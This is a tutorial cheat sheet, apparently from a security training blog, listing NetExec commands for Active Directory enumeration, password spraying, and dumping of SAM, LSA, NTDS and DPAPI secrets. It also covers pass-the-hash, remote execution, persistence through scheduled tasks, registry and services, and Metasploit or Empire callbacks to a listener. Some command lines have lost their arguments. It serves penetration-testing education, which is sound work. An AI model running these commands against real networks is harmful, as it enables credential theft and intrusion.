NetExec Cheat Sheet: Essential Commands (2025 Guide)

SKFebruary 24, 2025

0 36 11 minutes read

NetExec Cheat Sheet: Essential Commands (2025 Guide)

NetExec is the new hacking tool on the block, quickly becoming the go-to tool for penetration testers, red teamers, and cyber security professionals.

It’s incredibly versatile. It offers all the great features of CrackMapExec but drastically expands on CME’s capabilities.

This NetExec cheat sheet will teach you everything you need to know to use this awesome network hacking tool, including how to use it for enumeration, credential harvesting, gaining initial access, performing lateral movement, and various post-exploitation tasks.

Let’s start.

What Is NetExec

NetExec (aka nxc) is a network hacking tool designed to help you automate the security assessment of large-scale corporate networks.

It allows you to perform enumeration, command execution, and post-exploitation within a Windows environment with its rich feature set and support for various network protocols, such as SMB, LDAP, WinRM, and more.

NetExec was born out of the famous CrackMapExec hacking tool.

CrackMapExec, known as the “Swiss Army knife” for targeting Windows Active Directory environments, was extensively used in the penetration testing community. However, in 2023, the project was archived, and maintenance stopped.

To carry on this project’s legacy and extend and improve its functionalities, contributors to the original project decided to fork the code and continue the project under a new name, NetExec.

They aim to sustain a community-driven and well-maintained project with regular updates that penetration testers, red teamers, and aspiring hackers can use in the years to come.

With this goal in mind, NetExec offers users the following key features:

Remote command execution: NetExec allows you to execute arbitrary commands on remote machines using various network protocols, such as SMB, LDAP, WinRM, and PowerShell.
Network enumeration: NetExec can gather information about network-connected systems, including active hosts, shared resources, and open ports. This lets you understand the network’s layout, identify vulnerable machines, and target weaknesses.
Post-exploitation capabilities: NetExec has a range of post-exploitation capabilities, such as automating repetitive tasks, deploying scripts, extracting data, performing lateral movement, and manipulating Windows authentication tokens. These capabilities make it ideal once you gain initial access during a penetration test.
Powerful modules: NetExec comes with various modules you can use to automate common hacking tasks, such as finding vulnerabilities, downloading/uploading files, and performing Active Directory enumeration.
Integrations: NetExec has strong integrations with other post-exploitation tools and frameworks, such as Metasploit, PowerShell Empire, and BloodHound.You can use it alongside these tools to build and execute PowerShell scripts and batch files and other malware.

These features go above and beyond the original CrackMapExec project with new modules, wider network protocol support, and improved efficiency. Let’s explore how you can use NetExec, dubbed by many as “CrackMapExec on steroids.”

Installing NetExec Tutorial

NetExec is primarily built in Python, offering numerous Python-specific installation options.

However, it’s also included in the Kali Linux repositories, so you can easily install it with the apt package manager.

Installing NetExec with package manager

To install NetExec on Kali Linux, run the following commands:

apt update

apt install netexec

Installing NetExec as a Python package

To install NetExec as a Python package, first, install the pipx Python packager installer with the command: sudo apt install pipx git.

Next, run the following command to install NetExec and its nxcdb backend-database system-wide:

pipx ensurepath

pipx install git+https://github.com/Pennyw0rth/NetExec

You can then run NetExec by opening a new shell.

Installing NetExec from GitHub

If you want the bleeding-edge version of NetExec, you can install it from the source by cloning the GitHub repository and using the Poetry package installer—which NetExec uses to manage dependencies.

First, install Poetry with the following commands:

apt install pipx git

pipx ensurepath

pipx install poetry

poetry self add "poetry-dynamic-versioning[plugin]"

poetry dynamic-versioning enable

Next, clone the NetExec GitHub repository and use Poetry to install its dependencies:

git clone https://github.com/Pennyw0rth/NetExec

cd NetExec

poetry install

poetry run NetExec

Once NetExec is installed, you’re ready to dive in and get your hands dirty.

General NetExec Syntax and Options

All NetExec commands follow the syntax: nxc [runtime options] [options] [-M module] [-o module options].

Command Line Component	Description	Examples
`[runtime options]`	These are runtime options that affect the command’s performance.	`-h` displays the help menu `-t THREADS` sets the number of concurrent threads. `--timeout TIMEOUT` sets a max timeout in seconds for each thread. `--jitter INTERVAL` sets a random delay between each connection.
	NetExec can interact with various network protocols. Each can be used to perform specific tasks related to enumeration, exploitation, or lateral movement.	`wmi` `mssql` `ssh` `vnc` `ftp` `winrm` `rdp` `smb` `ldap`
`.`	The target is the IP address, network range, or hostname of the machine(s) you’re attacking.	`192.168.1.100` `10.0.39.0/24` `webserver1`
`[options]`	Options are specific to the service you’re targeting, but there are common ones you’ll see.	`-u` for the username `-p` for the password `-h` gets help for that module `-x COMMAND` executes a command on the target `-X PS_COMMAND` executes a PowerShell command.
`[-M module]`	Each protocol NetExec supports has various modules that you can use to exploit vulnerabilities, target credentials, or gather information. These can be low- or high-privileged (requiring admin access).	`-M add-computer` adds or deletes a domain computer. `-M firefox` dumps credentials from Firefox. `-M rdp` enables or disables RDP. `-M reg-query` performs a registry query on the machine. `-L` lists available modules for that protocol.
`[-o module options]`	These options are specific to the module you choose to run and are set with the syntax `OPTION=”value”`.	`-o NAME=` specifies a name for a computer to add. `-o Delete=True` sets a Boolean option to true (to delete computer). `-M --options` displays the module’s options.

Discovery and Enumeration With NetExec

Most of NetExec’s most powerful capabilities fall under its smb option, which allows you to discover new machines, enumerate network information, and execute commands on remote machines.

You can use it to identify live hosts and collect data on domain users, groups, network shares, computers, and active sessions.

If these built-in capabilities aren’t enough, you can also execute Windows Management Instrumentation (WMI) queries to gather information about Active Directory objects.

Command	Description
`nxc`	Scans for a specific service (e.g., `winrm`, `ldap`, `ssh`, `rdp`, `mssql`, `ftp`, `smb`.); this can be used to identify live hosts and open ports.
`nxc smb -u -p --users [USER]`	Enumerates domain users. If a user is specified, more information is returned (e.g., access, password policy, etc.). Use the `--loggedon-users` options to view users logged onto the target machine.
`nxc smb -u -p --groups [GROUP]`	Enumerates domain groups. If a group is specified, more information is returned. Use the `--local-groups` option to view groups local to the target machine.
`nxc smb -u -p --computers [COMPUTER]`	Enumerates computer users (workstations and servers).
`nxc smb -u -p --shares`	Enumerates shares and access.
`nxc smb -u -p -M spider_plus`	Enumerates shares and automatically dumps all files from any readable share.
`nxc smb -u -p --sessions`	Enumerates active sessions (users currently accessing a share and you could target).
`nxc smb -u -p --wmi`	Executes a specified WMI query to enumerate specific information about domain objects.

Credential Harvesting and Brute Forcing With NetExec

NetExec is capable of performing various password and credential harvesting attacks. It can run arbitrary commands to gather information, execute password spraying against entire subnets, and dump credential data.

Command	Description
`nxc -u -p -x ‘net localgroup administrators’`	Identifies the local Administrator account across machines.
`nxc -u -p > -X ‘Get-LocalGroupMember -Group "Administrators"’`	Identifies the local Administrator account across machines using PowerShell.
`Nxc ldap -u -p -M whoami`	Identifies the local Administrator account across machines using `whoami` command.
`nxc -u -p`	Performs a password spray attack against . The option can be a single user, a list of usernames (comma separated), or a file containing usernames. The same goes for the option with passwords. Use the runtime options above to tune your attack and avoid getting locked out or detected.
`Nxc -u -p --port`	If the service is not running on its standard port, use the `--port` option to specify the custom port.
`nxc -u -p --no-bruteforce`	To try username and password combinations (e.g., `user1:password1`, `user2:password2`), rather than password spraying with a list of usernames and passwords, use the `--no-bruteforce` option.
`nxc -u -p --continue-on-success`	To continue guessing login credentials, even after being successful once, use the `--contine-on-success` option.
`nxc -u -p --sam`	Dumps SAM hashes from the target system after a successful login. You can use `smb` or `winrm` services.
`nxc -u -p --lsa`	Dumps LSA secrets from the target system after a successful login. You can use `smb` or `winrm` services.
`nxc smb -u -p --ntds [vss,drsupai ]`	Dumps the NTDS.dit file from the target Domain Controller after a successful login. You can use either `vss` or `drsuapi` as the method (`drsuapi` is the default). Use the `--user` option to dump only a specific user.
`nxc smb -u -p --dpapi [cookies,nosystem]`	Dumps DPAPI secrets from the target machine. You dump cookies with the `cookies` options or use the `nosystem` option not to dump the SYSTEM dpapi (better opsec).

Gaining Access and Lateral Movement With NetExec

NetExec can allow you to gain access to target systems through SMB, WinRM, and LDAP using usernames, passwords, hashes, or Kerberos tickets. This makes it a great hacking tool for performing pass-the-hash and pass-the-ticket attacks.

Using these protocols, you can also use NetExec to execute custom commands against single or multiple machines at once. This allows you to blend in with legitimate traffic while performing lateral movement in Windows Active Directory environments.

Command	Description
`nxc -u -p --sam`	Dumps SAM hashes from the target system after a successful login, then you can use this to perform a pass-the-hash attack. You can use the `smb` or `winrm` protocol.
`nxc ldap -u -p --asreproast`	Gets AS-REP response ready to crack with Hashcat to perform ASREP-roasting to target Active Directory.
`nxc ldap -u -p --kerberoasting`	Gets the TGS ticket ready to crack with Hashcat to perform Kerberoasting to target Active Directory
`nxc -u -H`	You can log in using NTLM hashes for protocols that use NTLM (e.g., `winrm`, `rdp`, `smb`, `ldap`, `mssql`). Use the `-H` option followed by a single hash, a list of hashes (comma-separated), or a file containing hashes. This is known as a pass-the-hash attack and is for lateral movement.
`nxc -k`	You can log in using a Kerberos ticket for services that use Kerberos (e.g., `winrm`, `rdp`, `smb`, `ldap`, `mssql`). Use the `-k` option followed by a Kerberos ticket. This is known as a pass-the-ticket attack and is for lateral movement.
`nxc -u -p -x`	Executes the specified command on the target machine after successful login. Use the `--no-output` option to not retrieve the command output.
`nxc -u -p -X`	Executes a PowerShell command (`PS_COMMAND`) on the systems after successful login.
`nxc smb -u -p --exec-method -x`	Executes the specified command on the target machine after successful login using a specific method. This `METHOD` can be `mmcexec`, `atexec`, `smbexec`, or `wmiexec`.
`nxc -u -p`	Lateral movement: login to a remote system using the stolen username or password.

Post-Exploitation With NetExec

After gaining access to a target machine, you must start the post-exploitation stage of your penetration test. NetExec is the perfect tool for the job. It can help you establish persistence, gather information on networks, systems, and installed applications, and even upload and download files.

Command	Description
`nxc smb -u -p -M rdp`	Enables RDP on the target machine after a successful login. It’s useful to get an RDP session on target.
`nxc smb -u -p -M impersonate`	Log into the machine and list tokens you can impersonate on the machine to escalate your privileges.
`nxc smb -u -p -M install_elevated`	Check for files with the `AlwaysInstallElevated` attribute that can be used to escalate your privileges.
`nxc smb -u -p -M enum-avproducts`	Gathers information on all anti-virus and endpoint detection solutions installed on the machine.
`nxc smb -u -p -M enum_dns`	Log into the machine and use WMI to dump DNS from the AD DNS server.
`nxc smb -u -p -M get_netconnections`	Uses WMI to get the target machine’s current network connections.
`nxc smb -u -p -M keypass_discover`	Searches for KeePass-related files and processes from which you could steal credentials.
`nxc ldap -u -p -M get-network`	Retrieves information about the Active Directory network environments.
`nxc ldap -u -p -M laps`	Retrieves Windows Local Administrator Password Solution (LAPS) passwords.
`nxc mssql -u -p -M mssql_priv`	Automatically enumerates and exploits MSSQL privileges.
`nxc smb -u -p --get-file REMOTE LOCAL`	Gets a remote file from the target machine (e.g., `--get-file \\Windows\\Temp\\creds.txt. creds.txt`).
`nxc smb -u -p --put-file LOCAL REMOTE`	Puts a local file onto the target machine (e.g., `--put-file backdoor.exe \\Windows\\Temp\\backdoor.exe`).
`nxc -u -p --x ‘schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr ’`	Persistence: Creates a scheduled task on the target system that executes a reverse shell `PAYLOAD` at a specified interval or system event after uploading the `PAYLOAD` to the machine first.
`nxc -u -p --x 'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v /t REG_SZ /d ""'`	Persistence: Executes a registry `PAYLOAD` when the user logs in or the system starts up after uploading the `PAYLOAD` to the machine first.
`nxc smb -u -p --put-file "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"`	Persistence: Drops a `PAYLOAD` in the Windows startup folder executed when the user logs in.
`nxc -u -p --x sc create binPath= "" start= auto'`	Persistence: Installs a service on the target system that executes a `PAYLOAD` on start-up after uploading the `PAYLOAD` to the machine first.

NetExec Advanced Techniques

NetExec has many advanced features that distinguish it from its predecessor, CrackMapExec. These include running a built-in Bloodhound collector for Active Directory enumeration, extracting Microsoft Teams information, and taking screenshots of target systems through RDP.

Command	Description
`nxc -u -p -X --obfs`	Obfuscates PowerShell scripts/commands ran.
`nxc ldap -u -p --bloodhound --collection All`	Execute NetExec’s built-in Bloodhound collector to gather information about the Active Directory environment you’re enumerating.
`nxc ldap -u -p -M teams_localdb`	Steal Microsoft Teams cookies to retrieve user, message, and group information.
`nxc mssql -u -p --local-auth -x whoami`	Execute Windows commands on an MSSQL server.
`nxc rdp -u -p --screenshot [--screentime ]`	Take a screenshot of the target system using RDP. If Network Level Authentication (NLA) is disabled, use the `--nla-screenshot` option.
`nxc -u -p -M empire_exec -o LISTENER=`	Logs in to a remote system using a stolen username or password and automatically generates and executes a PowerShell Empire launcher that calls back to the specified . This lateral movement command gives you a PowerShell Empire agent on the system.
`nxc -u -p --local-auth -M met_inject -o LHOST= LPORT=`	Logs in to a remote system using the stolen username or password and automatically generates and injects Metasploit shellcode that calls back to a Metasploit handler using `LHOST` and `LPORT`. This gives you a Metasploit shell on the system.

NetExec Cheat Sheet Conclusion

This cheat sheet includes everything you need to get started with NetExec. You now know how to perform enumeration, credential harvesting, and post-exploitation, all with one powerful hacking tool.

It’s time to trade in your old CrackMapExec and use NetExec for all your network penetration testing needs.

If you want to learn more about network penetration testing, red teaming, and ethical hacking, check out the StationX Accelerator Program. It includes everything you need to jumpstart your cyber security career with professional mentorship, a tailored career roadmap, a vibrant community, and 1,000+ courses and labs.

Here are some of the available courses:

Frequently Asked Questions

NetExec is a network hacking tool that executes commands on remote systems, performs network enumeration, and runs post-exploitation tasks. It’s often used during penetration tests and red team engagements to facilitate common network and Active Directory enumeration. Its integration with other hacking tools and its support for automation, remote command execution, and integrations make it useful for post-exploitation activities.

Is NetExec better than CrackMapExec?

Yes. NetExec is the successor of the popular CrackMapExec tool and offers advanced capabilities, such as direct integration with BloodHound, better network protocol support, and more. It’s actively maintained and a must-have for penetration tests and red team engagements.

Level Up in Cyber Security: Join Our Membership Today!

Adam is a seasoned cyber security professional with extensive experience in cyber threat intelligence and threat hunting. He enjoys learning new tools and technologies, and holds numerous industry qualifications on both the red and blue sides. Adam aims to share the unique insights he has gained from his experiences through his blog articles. You can find Adam on LinkedIn or check out his other projects on LinkTree.